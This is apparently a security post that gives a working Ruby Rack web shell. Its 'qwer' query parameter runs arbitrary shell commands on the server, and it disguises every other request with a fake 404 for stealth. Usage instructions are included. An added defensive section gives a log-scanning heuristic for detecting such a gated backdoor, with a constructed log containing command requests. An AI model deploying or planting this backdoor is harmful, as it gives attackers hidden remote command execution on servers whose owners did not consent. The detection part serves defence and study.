```ruby
require 'rack'
require 'rack/server'

class RackWebShell
  def self.call(env)
    request = Rack::Request.new env
    response = Rack::Response.new
    unless request.params['qwer'].nil?
      response.write `#{request.params['qwer']}`
      response.finish # return the generated triplet
    else
      response.write "ERROR 404: File Not Found\n"
      response.status = 404
      response.finish
    end
  end
end

Rack::Server.start :app => RackWebShell
```
You can execute commands by simply making a GET request to /?qwer=<insert command here> (you still have to URL-encode spaces and special characters).
And if someone doesn't supply the correct parameter or path, it returns a 404 (provides a tiny bit of stealthiness).
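From the defender's side, the behaviour described above leaves a recognisable trace in access logs: every request is answered with a 404 except those carrying one particular parameter, and those 200 responses vary in size. The Ruby code below is an added example, not part of the original post, that looks for that pattern; the log lines are constructed, and the names `gating_params` and `decode_value` and the `min_hits` threshold are assumptions.

```ruby
require 'uri'

# Constructed sample access log (common log format); not taken from the original post.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 404 26
  198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 404 26
  203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /?qwer=id HTTP/1.1" 200 54
  203.0.113.9 - - [01/Jan/2024:10:02:40 +0000] "GET /?qwer=uname%20-a HTTP/1.1" 200 112
  198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /?page=2 HTTP/1.1" 404 26
LOG

LINE_RE = /"(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)/

# Percent-decode a value for the analyst; keep the raw text if it is malformed.
def decode_value(raw)
  URI.decode_www_form_component(raw.to_s)
rescue ArgumentError
  raw.to_s
end

# Return the query parameters whose presence is the only thing that turns a
# 404 into a 200, with response sizes that change from request to request.
def gating_params(log_text, min_hits: 2)
  stats = Hash.new { |h, k| h[k] = { ok: 0, other: 0, sizes: [], values: [] } }
  requests = []
  log_text.each_line do |line|
    m = LINE_RE.match(line) or next
    query = m[1].split('?', 2)[1].to_s
    pairs = query.split('&').reject(&:empty?).map { |kv| kv.split('=', 2) }
    requests << { names: pairs.map(&:first), status: m[2] }
    pairs.each do |name, value|
      rec = stats[name]
      rec[m[2] == '200' ? :ok : :other] += 1
      rec[:sizes] << m[3].to_i
      rec[:values] << decode_value(value)
    end
  end
  stats.select do |name, rec|
    ok_without = requests.count { |r| r[:status] == '200' && !r[:names].include?(name) }
    rec[:ok] >= min_hits && rec[:other].zero? && ok_without.zero? &&
      rec[:sizes].uniq.size > 1
  end
end

if __FILE__ == $PROGRAM_NAME
  gating_params(SAMPLE_LOG).each do |name, rec|
    puts "suspicious parameter #{name.inspect}: #{rec[:ok]} hits, values #{rec[:values].inspect}"
  end
end
```

On a server that also serves ordinary 200 pages the heuristic stays quiet, so it fits a listener that, like the one above, answers 404 to everything else.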